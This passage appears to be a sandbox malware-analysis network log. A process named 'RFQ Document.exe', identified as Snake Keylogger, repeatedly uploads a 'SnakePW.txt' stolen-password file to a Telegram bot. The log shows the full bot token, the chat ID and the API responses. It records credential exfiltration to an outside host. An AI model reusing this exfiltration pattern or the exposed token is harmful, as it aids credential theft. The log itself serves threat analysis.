2021-09-28 05:59:04 UTC	243	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:04 UTC	244	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12740,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808744,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
153	192.168.2.4	49962	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:04 UTC	244	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dbd459f3 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:04 UTC	245	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 64 34 35 39 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dbd459f3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:04 UTC	245	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:04 UTC	245	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12741,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808744,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
154	192.168.2.4	49964	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:04 UTC	246	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dc197d55 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:04 UTC	246	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 31 39 37 64 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dc197d55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:04 UTC	247	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:04 UTC	247	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12742,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808744,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
155	192.168.2.4	49965	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:05 UTC	247	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dc3fa396 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:05 UTC	248	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 33 66 61 33 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dc3fa396Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:05 UTC	248	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:05 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:05 UTC	249	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12743,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808745,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
156	192.168.2.4	49967	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:05 UTC	249	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dc5ea195 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:05 UTC	249	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 35 65 61 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dc5ea195Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:05 UTC	250	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:05 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:05 UTC	250	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12744,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808745,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
157	192.168.2.4	49968	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:05 UTC	251	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dcc2c405 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:05 UTC	251	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 63 32 63 34 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dcc2c405Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:06 UTC	251	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:06 UTC	252	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12745,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
158	192.168.2.4	49970	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:06 UTC	252	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dcf010c9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:06 UTC	253	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 66 30 31 30 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dcf010c9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:06 UTC	253	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:06 UTC	253	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12746,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
159	192.168.2.4	49972	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:06 UTC	254	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dd0f0f14 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:06 UTC	254	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 30 66 30 66 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dd0f0f14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:06 UTC	255	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:06 UTC	255	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64 Data Ascii: 